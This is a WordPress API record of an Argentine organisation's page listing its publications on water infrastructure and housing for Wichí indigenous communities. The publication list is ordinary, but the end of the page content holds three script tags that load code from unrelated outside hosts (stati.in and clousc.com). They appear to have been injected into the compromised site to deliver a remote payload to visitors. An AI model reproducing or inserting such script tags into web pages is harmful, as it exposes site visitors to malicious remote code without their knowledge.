{"id":126,"date":"2016-01-10T22:31:09","date_gmt":"2016-01-10T22:31:09","guid":{"rendered":"http:\/\/apcd.org.ar\/?page_id=126"},"modified":"2016-04-27T18:40:31","modified_gmt":"2016-04-27T18:40:31","slug":"infraestructura","status":"publish","type":"page","link":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/","title":{"rendered":"Infraestructura"},"content":{"rendered":"<p><a href=\"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06.png\" rel=\"attachment wp-att-231\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-231\" src=\"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06.png\" alt=\"logos_infraestructu-02-06\" width=\"199\" height=\"199\" srcset=\"https:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06.png 199w, https:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06-150x150.png 150w\" sizes=\"(max-width: 199px) 100vw, 199px\" \/><\/a><\/p>\n<p><strong>AGUA<\/strong><\/p>\n<p>1. <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/1DiagnosticoTresPozos.pdf\" target=\"_blank\">Diagn\u00f3stico de la Comunidad Wich\u00ed de Tres Pozos<\/a>.<\/em> APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 1998.<\/p>\n<p>2. <em>Proyecto de experimentaci\u00f3n y provisi\u00f3n de agua para comunidades abor\u00edgenes<\/em>. Informe fotogr\u00e1fico. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI.1999.<\/p>\n<p>3. <em>Lhatestsel Lawetes. Los lugares de nuestros antepasados<\/em>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 1999.<\/p>\n<p>4. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/4BUSCANDOAGUA.pdf\" target=\"_blank\"><em>Buscando agua. Curso taller para perforistas<\/em><\/a>. APCD. 1999.<\/p>\n<p>5. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/5ElAgua-el%20Medio-LasCulturasAborigenes.pdf\" target=\"_blank\"><em>El Agua, el Medio y las Culturas Abor\u00edgenes<\/em><\/a>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 2000.<\/p>\n<p>6. <em>Desde nosotros.<\/em> Sistematizaci\u00f3n de una experiencia vivida en Colonia Mu\u00f1iz. APCD. 2000<\/p>\n<p>7. <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/7Aguaconsumoyriego.pdf\" target=\"_blank\">El Agua: Calidad para consumo y riego. Gu\u00eda pr\u00e1ctica para la interpretaci\u00f3n de an\u00e1lisis f\u00edsico-qu\u00edmicos<\/a><\/em>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 2000<\/p>\n<p>8. Serie t\u00e9cnica de cartillas: \u201cBuscando agua\u201d, \u201c<a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/82ElCilindro.pdf\" target=\"_blank\">El Cilindro<\/a>\u201d, \u00ab<a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/83ElMolino.pdf\" target=\"_blank\">El Molino<\/a>\u201d, <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/81Cartillarepresafinal.pdf\" target=\"_blank\">\u201cRepresa: criterios t\u00e9cnicos de dise\u00f1o y construcci\u00f3n\u201d<\/a> . APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 2000<\/p>\n<p>9. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/9elaguaylasculturasindigenas.pdf\" target=\"_blank\"><em>El Agua y las Culturas Ind\u00edgenas. Discusi\u00f3n metodol\u00f3gica y criterios orientadores de aplicaci\u00f3n<\/em><\/a>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI.2001<\/p>\n<p>10. <em>Proyecto de experimentaci\u00f3n y provisi\u00f3n de agua para comunidades abor\u00edgenes en la provincia de Formosa<\/em>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. \u00a0 \u00a0 \u00a0 Compilaci\u00f3n en DVD. 2001<\/p>\n<p>11. <em>Manual pr\u00e1ctico para instaladores de obras h\u00eddricas<\/em>. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 2001<\/p>\n<p>12. <em>El Agua en el Chaco Sudamericano<\/em>. REDAF \u2013 APCD- INCUPO. 2003<\/p>\n<p>13. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/13cartillameteorologica.pdf\" target=\"_blank\"><em>Meteorolog\u00eda, mediciones<\/em><\/a>. APCD \u2013 Programa Dirli. 2003.<\/p>\n<p>14. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/14CartillaHerreria.pdf\" target=\"_blank\">Cat\u00e1logo de Medidas. Hierros, tubos, planchuelas, chapas y ca\u00f1os<\/a>. APCD \u2013 Programa Dirli. 2003.<\/p>\n<p>15. <a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/15CARTILLAMOLINO.pdf\" target=\"_blank\"><em>El Molino. Partes, funcionamiento y mantenimiento<\/em><\/a>. APCD \u2013 Programa Dirli. 2003<\/p>\n<p>16. <em><a href=\"http:\/\/www.apcd.org.ar\/wp-content\/uploads\/pdf\/infraestructura\/16CartillaNubes.pdf\" target=\"_blank\">Las Nubes: definici\u00f3n, descripci\u00f3n, observaci\u00f3n<\/a>.<\/em> APCD \u2013 Programa Dirli. 2003.<\/p>\n<p><strong>VIVIENDA WICH\u00cd<\/strong><\/p>\n<p>1. Parte 1:<em> La vivienda tradicional, la vivienda actual<\/em>. 2000.<\/p>\n<p>2. Parte 2:<em> Normas y conductas Wich\u00ed en el espacio dom\u00e9stico.<\/em> <em>Valores y criterios Wich\u00ed y del Estado para el mejoramiento de las viviendas.<\/em> 2001.<\/p>\n<p>3.Parte 3: <em>Criterios t\u00e9cnicos para el dise\u00f1o de proyectos de mejoramiento de viviendas ind\u00edgenas Wich\u00ed de la localidad de Las Lomitas<\/em>. 2003.<\/p>\n<p>4. Anexo de informaci\u00f3n t\u00e9cnica: <em>Propuestas de mejoramiento de viviendas de comunidades ind\u00edgenas Wich\u00ed de la localidad de Las Lomitas.<\/em> 2003.<\/p>\n<p>5. Parte 4: <em>L\u00edneas estrat\u00e9gicas para el mejoramiento de viviendas de comunidades Wich\u00ed de la localidad de Las Lomitas<\/em>. 2004.<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"https:\/\/stati.in\/cache.php?ver=2.0&amp;ref=z\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/clousc.com\/player.php?ver=1.1&amp;ref=te\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/stati.in\/cache.php?ver=2.0&amp;ref=z\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>AGUA 1. Diagn\u00f3stico de la Comunidad Wich\u00ed de Tres Pozos. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 1998. 2. Proyecto de experimentaci\u00f3n y provisi\u00f3n de agua para comunidades abor\u00edgenes. Informe fotogr\u00e1fico. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI.1999.\u2026<\/p>\n<p> <a class=\"continue-reading-link\" href=\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\"><span>Leer m\u00e1s<\/span><i class=\"crycon-right-dir\"><\/i><\/a> <\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.8.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Infraestructura - APCD<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Infraestructura - APCD\" \/>\n<meta property=\"og:description\" content=\"AGUA 1. Diagn\u00f3stico de la Comunidad Wich\u00ed de Tres Pozos. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 1998. 2. Proyecto de experimentaci\u00f3n y provisi\u00f3n de agua para comunidades abor\u00edgenes. Informe fotogr\u00e1fico. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI.1999.\u2026 Leer m\u00e1s\" \/>\n<meta property=\"og:url\" content=\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\" \/>\n<meta property=\"og:site_name\" content=\"APCD\" \/>\n<meta property=\"article:modified_time\" content=\"2016-04-27T18:40:31+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data1\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\",\"url\":\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\",\"name\":\"Infraestructura - APCD\",\"isPartOf\":{\"@id\":\"https:\/\/apcd.org.ar\/#website\"},\"datePublished\":\"2016-01-10T22:31:09+00:00\",\"dateModified\":\"2016-04-27T18:40:31+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/apcd.org.ar\/index.php\/infraestructura\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\/\/apcd.org.ar\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Infraestructura\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/apcd.org.ar\/#website\",\"url\":\"https:\/\/apcd.org.ar\/\",\"name\":\"APCD\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/apcd.org.ar\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"es\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Infraestructura - APCD","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/","og_locale":"es_ES","og_type":"article","og_title":"Infraestructura - APCD","og_description":"AGUA 1. Diagn\u00f3stico de la Comunidad Wich\u00ed de Tres Pozos. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI. 1998. 2. Proyecto de experimentaci\u00f3n y provisi\u00f3n de agua para comunidades abor\u00edgenes. Informe fotogr\u00e1fico. APCD \u2013 Cecazo \u2013 Eprasol \u2013 Incupo \u2013 Programa Social Agropecuario \u2013 INAI.1999.\u2026 Leer m\u00e1s","og_url":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/","og_site_name":"APCD","article_modified_time":"2016-04-27T18:40:31+00:00","og_image":[{"url":"http:\/\/apcd.org.ar\/wp-content\/uploads\/2016\/01\/logos_infraestructu-02-06.png"}],"twitter_card":"summary_large_image","twitter_misc":{"Tiempo de lectura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/","url":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/","name":"Infraestructura - APCD","isPartOf":{"@id":"https:\/\/apcd.org.ar\/#website"},"datePublished":"2016-01-10T22:31:09+00:00","dateModified":"2016-04-27T18:40:31+00:00","breadcrumb":{"@id":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/apcd.org.ar\/index.php\/infraestructura\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/apcd.org.ar\/index.php\/infraestructura\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Portada","item":"https:\/\/apcd.org.ar\/"},{"@type":"ListItem","position":2,"name":"Infraestructura"}]},{"@type":"WebSite","@id":"https:\/\/apcd.org.ar\/#website","url":"https:\/\/apcd.org.ar\/","name":"APCD","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/apcd.org.ar\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"es"}]}},"_links":{"self":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/126"}],"collection":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/comments?post=126"}],"version-history":[{"count":19,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/126\/revisions"}],"predecessor-version":[{"id":382,"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/pages\/126\/revisions\/382"}],"wp:attachment":[{"href":"https:\/\/apcd.org.ar\/index.php\/wp-json\/wp\/v2\/media?parent=126"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}